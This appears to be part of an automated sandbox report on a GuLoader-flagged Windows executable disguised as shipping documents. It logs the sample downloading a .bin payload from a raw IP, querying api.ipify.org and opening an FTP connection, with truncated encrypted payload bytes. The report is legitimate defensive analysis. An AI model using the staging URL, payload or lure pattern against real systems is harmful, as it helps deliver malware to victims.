                                              Oct 31, 2024 11:40:49.029454947 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.029469013 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.029479980 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.029486895 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.029486895 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.029509068 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.030249119 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.030270100 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.030311108 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.030591011 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.030631065 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.030647993 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.030664921 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.030678034 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.030689955 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.030703068 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.030729055 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.031477928 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.031501055 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.031512976 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.031514883 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.031547070 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.031547070 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.032054901 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.032084942 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.032098055 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.032109022 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.032121897 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.032124996 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.032146931 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.032162905 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.032833099 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.032862902 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.032874107 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.032901049 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.032919884 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.032939911 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.032953024 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.032984972 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.033699036 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.033744097 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.033782005 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.033905029 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.033916950 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.033927917 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.033951998 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.033968925 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.034054041 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.034075975 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.034087896 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.034099102 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.034102917 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.034111023 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.034123898 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.034136057 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.034141064 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.034141064 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.034147978 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.034158945 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.034171104 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.034183979 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.034185886 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.034194946 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.034207106 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.034208059 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.034220934 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.034235954 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.034260988 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.034813881 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.034837008 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.034848928 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.034877062 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.034893036 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.124731064 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.124756098 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.124773979 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.124785900 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.124798059 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.124810934 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.124828100 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.124840975 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.124851942 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.124921083 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.124921083 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.125261068 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.125272036 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.125283003 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.125312090 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.125344038 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.125386000 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.125452042 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.125452995 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.125463963 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.125473976 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.125503063 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.125505924 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.125519991 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.125531912 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.125546932 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.125560045 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.125564098 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.125571966 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.125585079 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.125587940 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.125608921 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.125634909 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.125770092 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.125782013 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.125792027 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.125828981 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.125828981 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.126734018 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.126781940 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.126791954 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.126805067 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.126833916 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.126833916 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.126844883 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.126858950 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.126871109 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.126882076 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.126900911 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.126921892 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.126952887 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.126962900 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.126992941 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127005100 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127007008 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.127016068 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127027988 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127038002 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127051115 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127053976 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.127053976 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.127068996 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127074003 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.127083063 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127094984 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127098083 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.127124071 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.127124071 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.127165079 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.127202988 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127247095 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.127263069 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127274990 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127290964 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127342939 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.127342939 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.127407074 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127418995 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127429962 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127465963 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127476931 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127486944 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127497911 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127509117 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127511024 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.127511024 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.127545118 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.127546072 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.127724886 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127738953 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127749920 CET805619484.38.133.42192.168.2.5
                                              Oct 31, 2024 11:40:49.127784014 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:49.127821922 CET5619480192.168.2.584.38.133.42
                                              Oct 31, 2024 11:40:50.259217978 CET56195443192.168.2.5172.67.74.152
                                              Oct 31, 2024 11:40:50.259279966 CET44356195172.67.74.152192.168.2.5
                                              Oct 31, 2024 11:40:50.259368896 CET56195443192.168.2.5172.67.74.152
                                              Oct 31, 2024 11:40:50.270169973 CET56195443192.168.2.5172.67.74.152
                                              Oct 31, 2024 11:40:50.270204067 CET44356195172.67.74.152192.168.2.5
                                              Oct 31, 2024 11:40:51.147990942 CET44356195172.67.74.152192.168.2.5
                                              Oct 31, 2024 11:40:51.148086071 CET56195443192.168.2.5172.67.74.152
                                              Oct 31, 2024 11:40:51.150186062 CET56195443192.168.2.5172.67.74.152
                                              Oct 31, 2024 11:40:51.150208950 CET44356195172.67.74.152192.168.2.5
                                              Oct 31, 2024 11:40:51.150500059 CET44356195172.67.74.152192.168.2.5
                                              Oct 31, 2024 11:40:51.192576885 CET56195443192.168.2.5172.67.74.152
                                              Oct 31, 2024 11:40:51.210159063 CET56195443192.168.2.5172.67.74.152
                                              Oct 31, 2024 11:40:51.251365900 CET44356195172.67.74.152192.168.2.5
                                              Oct 31, 2024 11:40:51.386362076 CET44356195172.67.74.152192.168.2.5
                                              Oct 31, 2024 11:40:51.386442900 CET44356195172.67.74.152192.168.2.5
                                              Oct 31, 2024 11:40:51.386503935 CET56195443192.168.2.5172.67.74.152
                                              Oct 31, 2024 11:40:51.392714977 CET56195443192.168.2.5172.67.74.152
                                              Oct 31, 2024 11:40:52.884023905 CET5619621192.168.2.5192.185.13.234
                                              Oct 31, 2024 11:40:52.888871908 CET2156196192.185.13.234192.168.2.5
                                              Oct 31, 2024 11:40:52.888950109 CET5619621192.168.2.5192.185.13.234
                                              Oct 31, 2024 11:40:52.895241022 CET5619621192.168.2.5192.185.13.234
                                              Oct 31, 2024 11:40:52.900490999 CET2156196192.185.13.234192.168.2.5
                                              Oct 31, 2024 11:40:52.900572062 CET5619621192.168.2.5192.185.13.234
                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 31, 2024 11:39:20.539854050 CET53650741.1.1.1192.168.2.5
                                              Oct 31, 2024 11:40:50.234553099 CET5649153192.168.2.51.1.1.1
                                              Oct 31, 2024 11:40:50.242856026 CET53564911.1.1.1192.168.2.5
                                              Oct 31, 2024 11:40:52.517667055 CET6207253192.168.2.51.1.1.1
                                              Oct 31, 2024 11:40:52.882674932 CET53620721.1.1.1192.168.2.5
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Oct 31, 2024 11:40:50.234553099 CET192.168.2.51.1.1.10xa3caStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              Oct 31, 2024 11:40:52.517667055 CET192.168.2.51.1.1.10xc816Standard query (0)ftp.concaribe.comA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Oct 31, 2024 11:40:50.242856026 CET1.1.1.1192.168.2.50xa3caNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                              Oct 31, 2024 11:40:50.242856026 CET1.1.1.1192.168.2.50xa3caNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                              Oct 31, 2024 11:40:50.242856026 CET1.1.1.1192.168.2.50xa3caNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                              Oct 31, 2024 11:40:52.882674932 CET1.1.1.1192.168.2.50xc816No error (0)ftp.concaribe.comconcaribe.comCNAME (Canonical name)IN (0x0001)false
                                              Oct 31, 2024 11:40:52.882674932 CET1.1.1.1192.168.2.50xc816No error (0)concaribe.com192.185.13.234A (IP address)IN (0x0001)false
                                              • api.ipify.org
                                              • 84.38.133.42
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.55619484.38.133.42806496C:\Users\user\Desktop\Shipping documents 000293994900.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 31, 2024 11:40:47.722033024 CET175OUTGET /FZBmQQQpasdj30.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: 84.38.133.42
                                              Cache-Control: no-cache
                                              Oct 31, 2024 11:40:48.544364929 CET1236INHTTP/1.1 200 OK
                                              Content-Type: application/octet-stream
                                              Last-Modified: Thu, 31 Oct 2024 05:54:00 GMT
                                              Accept-Ranges: bytes
                                              ETag: "6e807b48592bdb1:0"
                                              Server: Microsoft-IIS/8.5
                                              Date: Thu, 31 Oct 2024 10:40:46 GMT
                                              Content-Length: 241728
                                              Data Raw: 62 d8 9e 6a 8e 70 46 f2 66 aa d7 46 f3 5a 14 7b 59 9b d2 74 e5 47 20 b0 06 5f 2e a2 a6 0a 86 ce 0b a3 df da b5 db 62 20 8f 0e 3f ec c4 a5 1a df 5f c6 f2 d8 69 ee 5a 4f 94 54 dc 42 71 ae b7 09 fc 13 c0 e7 5e f2 ed 02 3e ad b3 c4 94 4c 9b 72 71 b3 67 af 51 ad 09 78 e6 b0 31 e0 a9 bc 4c 92 a7 fa 79 93 4c 48 a3 e3 7c c9 a4 07 8f 5c 77 95 d4 64 5d 5e b8 4c 0f 70 34 5d 3a e3 97 a3 78 a5 6f 7f a3 b8 3c d0 e1 29 93 58 94 c9 44 bb 79 11 1e 98 b8 7c b2 fc 24 0a 92 b3 9c b0 89 cf fe a6 5c 87 fc 53 b8 54 b2 63 20 ff 00 0b 53 22 cc e6 42 52 19 09 46 2c ec ee 40 e9 9a d5 68 4c b8 2e 57 a9 a3 99 9c 93 57 72 3f de 8c 9f 53 df 9d 07 4f e6 8d 71 5c f7 5b d8 1e c9 4b 95 76 7d 98 26 fe 66 ee 86 95 d0 db 74 71 b7 59 db 1a 7d 20 e1 08 e7 05 7a ce ec 34 e3 64 ca 3c 79 9b da 91 57 b2 ae 99 4f 20 65 23 f6 e2 3b ee d7 8d f4 4c c1 3f 6d d5 3a d5 d3 85 b1 d2 37 d0 35 54 36 95 7f 19 60 25 c0 fe 34 39 06 ec 5f 15 eb c7 f3 4c 7a 16 41 6c a9 4e 99 1a ed 8b 87 5b 38 79 02 98 ac ed 66 fe f7 7b 06 a4 45 9c cd b7 5d 4d 4d 60 67 6b 82 [TRUNCATED]
                                              Data Ascii: bjpFfFZ{YtG _.b ?_iZOTBq^>LrqgQx1LyLH|\wd]^Lp4]:xo<)XDy|$\STc S"BRF,@hL.WWr?SOq\[Kv}&ftqY} z4d<yWO e#;L?m:75T6`%49_LzAlN[8yf{E]MM`gkM9d(f-p|\,ZBr/g\gL]KYcw6KRB.EEdZC{D(9NT\>a@jWCk#A?xG~;pj{5$Hm:mW0,"Lv"DH3c)~B+bpt)F^g6;]"l+@6!1$ubY42KR9dd2O$`^lPv(FdDbp(*O#=u~UeFGw<6Giv"1}zkff=RP7si]sXqH<'#J1Dv1K$`r5nD'90<E_h6tWy<2@n&w>fTsrD&5:=oH#$$RK$W]V
                                              Oct 31, 2024 11:40:48.544387102 CET1236INData Raw: 92 d8 aa 50 02 08 c5 34 2a c0 1a 8e d8 d8 ae 59 6c a8 bd a8 22 44 db 77 44 b3 21 53 ad fe 95 dd 19 97 41 71 d1 18 2a 56 74 d2 56 de 10 4e d5 14 1e 55 c3 c4 f9 e6 13 3e b8 04 ce 24 c7 aa 24 50 86 29 25 17 5f 1e 8d 22 b1 27 83 05 c8 3c d9 9b 54 b0
                                              Data Ascii: P4*Yl"DwD!SAq*VtVNU>$$P)%_"'<TZC;Ybs T cvO)X\j=]T&1{Q54\u01/O~$Ny\$J y@eTi |)[/,*JqD]k?-]Qn
                                              Oct 31, 2024 11:40:48.544399023 CET1236INData Raw: a8 37 8a e1 73 6a 86 d5 c5 78 31 16 91 30 3f af 5a 8c 95 30 69 bf 85 90 07 e5 67 5c 61 3e 90 8a ee 46 4c d5 59 80 69 5b 60 0a 8e e3 9c 32 fd ca 02 d9 06 4b 72 48 98 54 c2 28 ee 35 4c 2f d4 a8 5c d4 5d 06 20 27 fa 91 40 02 fc 16 8a 7b 61 ce d3 b1
                                              Data Ascii: 7sjx10?Z0ig\a>FLYi[`2KrHT(5L/\] '@{a8 K\n6UcjUkg)wV?QYy~;|s7QliW&$sW6Ni"CF8eA~B'Khvh%`X
                                              Oct 31, 2024 11:40:48.544409990 CET636INData Raw: 94 24 9f b0 c6 35 f0 ce ab 02 61 01 ab 51 f0 7e fc f6 e1 8b 5a 99 33 1b e5 14 d7 5e e4 3c 07 3e 54 3f 8f 1a 33 68 e0 59 2b f2 49 fb c1 4d f3 a4 72 40 14 b2 0c 76 e6 4c 0e 79 b8 3c 68 d2 4f 97 5e b4 1f e8 34 46 2e 7f 1c 44 23 a8 3d fd b9 02 7a 37
                                              Data Ascii: $5aQ~Z3^<>T?3hY+IMr@vLy<hO^4F.D#=z7V>ogL"A|=7tx+Q^P1#ad]py"X?65ifwz72<_Ufvn]"vai\2TwN#B\5T
                                              Oct 31, 2024 11:40:48.544421911 CET1236INData Raw: 1b ae 35 b0 e1 70 11 13 d6 ed 3a 19 5c 95 32 32 ad 21 da 96 42 76 b5 a7 e2 2c 71 3b 5d 67 10 a4 f2 97 dd 31 88 5c aa 4f 5b 67 0a 48 e2 9c 32 d5 85 7d ae 14 4b 76 40 94 22 38 69 ef 45 60 e8 7a aa 59 91 6b 04 5b b4 e2 cb 95 55 bf 15 89 02 fa cc a8
                                              Data Ascii: 5p:\22!Bv,q;]g1\O[gH2}Kv@"8iE`zYk[U8>p9_64.b!@JFcmn#=?wG~;x6Mjv?2iA3Im]3,"Hv"TFBcNJk}bp3
                                              Oct 31, 2024 11:40:48.544431925 CET212INData Raw: b4 29 24 ef 98 d8 30 f0 c4 2b 5e 54 01 af 7a 10 72 86 24 1f 87 5f b3 31 19 e6 69 05 2c bf 38 2d 50 f4 ba 50 1b 33 4c cb 7b 29 f1 4a 2d c1 4d f3 fc 65 42 6f 19 7e 7b e2 66 5c 14 ae 41 b3 d8 ed 6d 78 ab 1d b3 ea 46 2e 7b 44 77 21 ab 30 83 47 0e 7f
                                              Data Ascii: )$0+^Tzr$_1i,8-PP3L{)J-MeBo~{f\AmxF.{Dw!0GhE<Ee-PTzQ[K(#bf|s"x@F~eEe|E*94LY`.hqRhN[wj
                                              Oct 31, 2024 11:40:48.659996986 CET1236INData Raw: d2 5d 36 7e 24 9f 71 71 a6 08 be 11 09 87 cd ee a6 09 b5 78 42 f2 5e c4 d3 7e aa c2 d5 dc 98 c3 31 80 bc de 36 1e 2f 49 cb 31 76 1f a4 a0 65 2f 52 ff e5 df 2c a5 2c 76 bb 4f 2b e7 ad f0 9e c6 41 33 56 32 bf 4a 30 22 10 87 91 be 90 e9 b4 d1 b1 d2
                                              Data Ascii: ]6~$qqxB^~16/I1ve/R,,vO+A3V2J0"2ieva"@`aV<9CyOEP}: ke|T)x1$LuLh|\}kb]J]:?xk9dH-@xB27$&r[n+g
                                              Oct 31, 2024 11:40:48.660048962 CET1236INData Raw: d8 44 dd bf a8 90 9f 10 85 88 8c dc e4 03 12 f7 40 f6 04 17 d5 db d0 65 98 99 ff d8 36 6a da 23 99 98 24 3a 46 ca 79 5a fb 21 4d 20 8d 17 ea ef 3c 54 41 99 e5 40 a8 d6 41 0b 3f ae ee a5 e0 39 d6 46 12 47 05 6f d1 15 27 40 14 1b 7b a1 d4 40 88 3f
                                              Data Ascii: D@e6j#$:FyZ!M <TA@A?9FGo'@{@?(\Gq~\R$Td3:8>{{nBoXM:G\##1Mnak7K1/c9O(S;K>f<~]v=/Fw^**;!P
                                              Oct 31, 2024 11:40:48.660062075 CET424INData Raw: af c4 bc 6e ef 77 0d 32 2c 22 b2 6b c9 65 02 c7 d6 de 97 9d a9 e0 cf 69 90 ec d2 64 b7 46 48 33 57 a7 97 63 29 e9 af ab dc 5e 43 8f 0d 2b b7 6a 32 e2 83 fd c7 2f fc 62 70 a8 5a f2 03 b8 8e c9 d1 d8 f3 df 1a dd 77 29 03 13 cf b7 9e 7e 8c c0 46 7e
                                              Data Ascii: nw2,"keidFH3Wc)^C+j2/bpZw)~F~g6d"#xn[3!1vbLUCzQ>,:%_#&e2(*@F_J|^A6 _m3hPdh\UR~}vOUy<1LeU+q
                                              Oct 31, 2024 11:40:48.660072088 CET1236INData Raw: c5 a1 3f 9c 53 c0 26 f8 f0 37 6f e7 6f e7 7e 76 a9 5e 6b 93 d8 01 48 d1 c1 94 95 99 b2 8a a5 b9 3d c2 31 f9 21 8b 59 52 96 dd 56 59 05 0b c9 f7 28 88 e4 57 1f f9 5d 7f 13 6d bd 0b f9 d6 aa 2a f1 55 72 5b 83 83 95 ad 67 90 41 71 2a 6a 61 d4 74 a2
                                              Data Ascii: ?S&7oo~v^kH=1!YRVY(W]m*Ur[gAq*jat~CN UCmF8TSy&M]`&5|To}7O T!ae"r**Mov^1p506\ULxOV_"N#\hVc/"rB,+"g
                                              Oct 31, 2024 11:40:48.660088062 CET212INData Raw: 06 ea 37 7b a3 8d 77 25 06 a4 41 e3 27 b4 5d 0f b6 75 60 6b 82 4f 4b cc 8a 64 d4 a8 11 a4 d7 b0 e0 6c 6a 9a e9 8d fe ae ae 1d d8 63 7d 17 11 d1 b7 1a 18 5c e3 30 6c af 5a 8c 17 4c 72 9f 81 92 49 0f 67 2c 4f 54 8e 88 9f 5e 43 d5 5d ae 39 3f 60 77
                                              Data Ascii: 7{w%A']u`kOKdljc}\0lZLrIg,OT^C]9?`wf6Kv0%Eyd(KC)4x=PR9OP[aD8%@,`M{7'~1tw5'='~


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.556195172.67.74.1524436496C:\Users\user\Desktop\Shipping documents 000293994900.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-31 10:40:51 UTC155OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                              Host: api.ipify.org
                                              Connection: Keep-Alive
                                              2024-10-31 10:40:51 UTC211INHTTP/1.1 200 OK
                                              Date: Thu, 31 Oct 2024 10:40:51 GMT
                                              Content-Type: text/plain
                                              Content-Length: 14
                                              Connection: close
                                              Vary: Origin
                                              cf-cache-status: DYNAMIC
                                              Server: cloudflare
                                              CF-RAY: 8db307807ad7e9b1-DFW
                                              2024-10-31 10:40:51 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37
                                              Data Ascii: 173.254.250.77


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:06:38:58
                                              Start date:31/10/2024
                                              Path:C:\Users\user\Desktop\Shipping documents 000293994900.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Shipping documents 000293994900.exe"
                                              Imagebase:0x400000
                                              File size:739'546 bytes
                                              MD5 hash:C8D26F7208EAAA31A839EC190489C9A1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3041044972.0000000006125000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:4
                                              Start time:06:40:38
                                              Start date:31/10/2024
                                              Path:C:\Users\user\Desktop\Shipping documents 000293994900.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Shipping documents 000293994900.exe"
                                              Imagebase:0x400000
                                              File size:739'546 bytes
                                              MD5 hash:C8D26F7208EAAA31A839EC190489C9A1
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
